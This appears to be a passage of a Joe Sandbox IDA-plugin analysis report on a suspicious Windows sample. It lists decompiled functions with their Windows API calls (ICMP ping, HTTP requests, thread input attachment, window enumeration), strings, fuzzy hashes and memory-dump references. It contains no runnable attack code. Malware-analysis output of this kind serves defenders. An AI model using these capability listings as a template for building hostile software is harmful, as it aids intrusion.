SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00F56BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00F56C18
VariantInit.OLEAUT32(?), ref: 00F56C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00F56C4A
VariantCopy.OLEAUT32(?,?), ref: 00F56C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00F56CB1
VariantClear.OLEAUT32(?), ref: 00F56CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00F56CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F56CDC
VariantClear.OLEAUT32(?), ref: 00F56CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00F56CF9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: beff9f64c3230bdc4c541703983adca7b1ba19942edfd214237117d4bd07feb5
Instruction ID: b83a9d73e2edc774cf57a797faf3525c0d5501a82379efaf1145cafd0db7b272
Opcode Fuzzy Hash: beff9f64c3230bdc4c541703983adca7b1ba19942edfd214237117d4bd07feb5
Instruction Fuzzy Hash: 1A415271A0011DAFCF00DF64DC489EEBBB9EF48351F408069EA55E7261DB35A949EF90

Function 00F75732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00F75793
inet_addr.WSOCK32(?,?,?), ref: 00F757D8
gethostbyname.WSOCK32(?), ref: 00F757E4
IcmpCreateFile.IPHLPAPI ref: 00F757F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F75878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00F758ED
WSACleanup.WSOCK32 ref: 00F758F3

Strings

Ping, xrefs: 00F75816

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 6f01d42a20dbcbad3917e37dc677382d1050cfa653aea95d701f950514f3b950
Instruction ID: 4f5601a374dfcb68cecca87947c327a2cc397f1aec3a9be8061a9728b32bec80
Opcode Fuzzy Hash: 6f01d42a20dbcbad3917e37dc677382d1050cfa653aea95d701f950514f3b950
Instruction Fuzzy Hash: 94515F71A046009FDB109F24DC45B6A7BE4EF48B20F14856AF95ADB2E1DBB4E904EB43

Function 00F6B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00F6B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00F6B546
GetLastError.KERNEL32 ref: 00F6B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00F6B5BD

Strings

READONLY, xrefs: 00F6B588
UNKNOWN, xrefs: 00F6B575
READY, xrefs: 00F6B596
NOTREADY, xrefs: 00F6B57C
INVALID, xrefs: 00F6B58F

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 31a3af1fbead480f4198a4b0ab121ef9e8b8b8494f72cb3ca38c9abeee2e82c9
Instruction ID: e78fa39975704a2ada22f09e206f2a6392684efcc33df73def741f2e6e61730e
Opcode Fuzzy Hash: 31a3af1fbead480f4198a4b0ab121ef9e8b8b8494f72cb3ca38c9abeee2e82c9
Instruction Fuzzy Hash: 2A316036A002099FCB00EB68CC85AFE77B4FF45310F188165E906D7295DB759E86EB51

Function 00F58F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00F59014
GetDlgCtrlID.USER32 ref: 00F5901F
GetParent.USER32 ref: 00F5903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F5903E
GetDlgCtrlID.USER32(?), ref: 00F59047
GetParent.USER32(?), ref: 00F59063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F59066

Strings

ListBox, xrefs: 00F58FD1
ComboBox, xrefs: 00F58F9C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 98e40e093508c8ec5708c24d0768b87ef0a0fed2b37883e9c0a874fdb59de884
Instruction ID: dcfd75cde2348937b891a7db4ebcea5108a7eff3ba5a606987adc1f298723173
Opcode Fuzzy Hash: 98e40e093508c8ec5708c24d0768b87ef0a0fed2b37883e9c0a874fdb59de884
Instruction Fuzzy Hash: 43219574A10208BFDF05ABA0CC85EFEBB75EF45310F100255BA51972E1DB799819FB20

Function 00F5907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F07DE1: _memmove.LIBCMT ref: 00F07E22

Part of subcall function 00F5AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00F5AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00F590FD
GetDlgCtrlID.USER32 ref: 00F59108
GetParent.USER32 ref: 00F59124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00F59127
GetDlgCtrlID.USER32(?), ref: 00F59130
GetParent.USER32(?), ref: 00F5914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00F5914F

Strings

ListBox, xrefs: 00F590BC
ComboBox, xrefs: 00F59087

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: a59e993e43c5297a6fa0bc742375be40fba915e2a114f4ee0f028a7a5c2272d3
Instruction ID: b9f1d1214d7acf803bec5fcaa7fa54d9f56ba2fd7cd26153daf8f32565c29d62
Opcode Fuzzy Hash: a59e993e43c5297a6fa0bc742375be40fba915e2a114f4ee0f028a7a5c2272d3
Instruction Fuzzy Hash: 1D21A175A00208BFDF05ABA4CC85EFEBB69EF45311F104155BA11972A1EB79981DFF20

Function 00F59163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00F5916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00F59184
_wcscmp.LIBCMT ref: 00F59196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F59211

Strings

largeicons, xrefs: 00F591A5
details, xrefs: 00F591BF
list, xrefs: 00F591F3
SHELLDLL_DefView, xrefs: 00F59190
smallicons, xrefs: 00F591D9

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 801dfde9ed9b18ccd3c7107f33cfa60179921630ec52c586bf76b6e7a009dd91
Instruction ID: d634b817ef399cf6941974d3aaa2c16595cb7517b70811ec2bf53b57a1cb5c4c
Opcode Fuzzy Hash: 801dfde9ed9b18ccd3c7107f33cfa60179921630ec52c586bf76b6e7a009dd91
Instruction Fuzzy Hash: 0E11273664C717FAFA183624EC06DE73B9CDB10331F200026FE00E00D1FEA1A9157A90

Function 00F788AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00F788D7
CoInitialize.OLE32(00000000), ref: 00F78904
CoUninitialize.OLE32 ref: 00F7890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00F78A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00F78B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00F92C0C), ref: 00F78B6F
CoGetObject.OLE32(?,00000000,00F92C0C,?), ref: 00F78B92
SetErrorMode.KERNEL32(00000000), ref: 00F78BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00F78C25
VariantClear.OLEAUT32(?), ref: 00F78C35

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 6e92511ccb070a4c5c1ac41481926e29da2b7c6c3ea419ac043beb2c16ccb53f
Instruction ID: 87dfb536d67f9121f97ee35098fc049b7aad078494ad4f242b63700e0eb2171e
Opcode Fuzzy Hash: 6e92511ccb070a4c5c1ac41481926e29da2b7c6c3ea419ac043beb2c16ccb53f
Instruction Fuzzy Hash: A1C14A71608305AFD700DF18C88896BB7E9FF89358F00891EF5899B251DB75ED06DB52

Function 00F67990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00F67A6C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 79185ccbb7cf8841360937ed20ebdfeefbf1ee219e1ed7f4d18ae2dc0e8a8d8d
Instruction ID: d262f8e047ad0498fe5cbea757045ba3f9a6392d710d16115f7ac283b481b5f2
Opcode Fuzzy Hash: 79185ccbb7cf8841360937ed20ebdfeefbf1ee219e1ed7f4d18ae2dc0e8a8d8d
Instruction Fuzzy Hash: 6EB1A271A083199FDB00EFA4C884BBEB7F4FF49329F244425E501E7291D778A941EB90

Function 00F611CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F611F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F61204
GetWindowThreadProcessId.USER32(00000000), ref: 00F6120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F6121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00F6122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F61245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00F60268,?,00000001), ref: 00F61257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F6129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F612B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00F60268,?,00000001), ref: 00F612BC

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 48886b71c8d1a05f8f96848defa6248f8d6fc618ae546c978847bac48cda2af8
Instruction ID: a38728400fa736d0ffb618f355f38c4df8dcd68b14c92542eee5cc7ef85691d4
Opcode Fuzzy Hash: 48886b71c8d1a05f8f96848defa6248f8d6fc618ae546c978847bac48cda2af8
Instruction Fuzzy Hash: 1431AC75A0020CAFDB209F54ED99FBA37A9BF56325F144229F900C71A0E7749D44EB60

Function 00F0FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00F0FAA6
OleUninitialize.OLE32(?,00000000), ref: 00F0FB45
UnregisterHotKey.USER32(?), ref: 00F0FC9C
DestroyWindow.USER32(?), ref: 00F445D6
FreeLibrary.KERNEL32(?), ref: 00F4463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00F44668

Strings

close all, xrefs: 00F0FAA1

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7cbb68f2e47e55572e4bc2f0494ea5f3163d2acae34c2fc83b7ede2efc67168d
Instruction ID: 35802368f4af92d74b24c90330e51e37f62c1acfb9e7c56a33eb133a4e91fa86
Opcode Fuzzy Hash: 7cbb68f2e47e55572e4bc2f0494ea5f3163d2acae34c2fc83b7ede2efc67168d
Instruction Fuzzy Hash: 75A18C31701212CFDB28EF14C995B69F764BF05710F5542ADE80AAB2A2DB34AD1AFF50

Function 00F5A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00F5A439), ref: 00F5A377

Strings

CLASS, xrefs: 00F5A0F6
REGEXPCLASS, xrefs: 00F5A13C
NAME, xrefs: 00F5A1A9
TEXT, xrefs: 00F5A2AE
INSTANCE, xrefs: 00F5A285
CLASSNN, xrefs: 00F5A119

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: 5cb38db300282ee5eb086f4fce1fe6d099039c2387a9c9673457a18fa5966445
Instruction ID: 2846270d67d5a353700f61099f0c2ff829055be92459c04aeaeb2559bfbb1758
Opcode Fuzzy Hash: 5cb38db300282ee5eb086f4fce1fe6d099039c2387a9c9673457a18fa5966445
Instruction Fuzzy Hash: A591D931900605AACB08EFA0C892BEDFB74BF04315F548219DD59A7181DF3569ADFF91

Function 00F02E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00F02EAE

Part of subcall function 00F01DB3: GetClientRect.USER32(?,?), ref: 00F01DDC
Part of subcall function 00F01DB3: GetWindowRect.USER32(?,?), ref: 00F01E1D
Part of subcall function 00F01DB3: ScreenToClient.USER32(?,?), ref: 00F01E45

GetDC.USER32 ref: 00F3CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00F3CD45
SelectObject.GDI32(00000000,00000000), ref: 00F3CD53
SelectObject.GDI32(00000000,00000000), ref: 00F3CD68
ReleaseDC.USER32(?,00000000), ref: 00F3CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00F3CDFB

Strings

U, xrefs: 00F3CCD0

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 77433b3bd7be0cf575e6adc34e1bad4066bdca84627146b9b385440287adbe0f
Instruction ID: af6944ef0920ca7e8958b92e428922833499e3e8b810f99472302e11c1bf9c6a
Opcode Fuzzy Hash: 77433b3bd7be0cf575e6adc34e1bad4066bdca84627146b9b385440287adbe0f
Instruction Fuzzy Hash: 99718431900209DFCF219F64CC85AEA7BB5FF48370F14426AFD556A2A6D7319891FBA0

Function 00F71A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F71A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00F71A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00F71ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00F71AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00F71AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00F71B10
InternetCloseHandle.WININET(00000000), ref: 00F71B57

Part of subcall function 00F72483: GetLastError.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F72498
Part of subcall function 00F72483: SetEvent.KERNEL32(?,?,00F71817,00000000,00000000,00000001), ref: 00F724AD

Strings

, xrefs: 00F71B01

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: 4254d18ca9b0f7e8259e45712ec3ffdf576cca9a705a1b77e137f8a8b068043f
Instruction ID: 01677a5df28be0350d9174c85f2a6c30302bf606d914f5db72e0a11aee541c85
Opcode Fuzzy Hash: 4254d18ca9b0f7e8259e45712ec3ffdf576cca9a705a1b77e137f8a8b068043f
Instruction Fuzzy Hash: A54162B1901219BFFB118F54CC89FFE776CFB48354F008126F90996141E7749E58ABA1

Function 00F78C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F8F910), ref: 00F78D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F8F910), ref: 00F78D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00F78ED6
SysFreeString.OLEAUT32(?), ref: 00F78F00

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
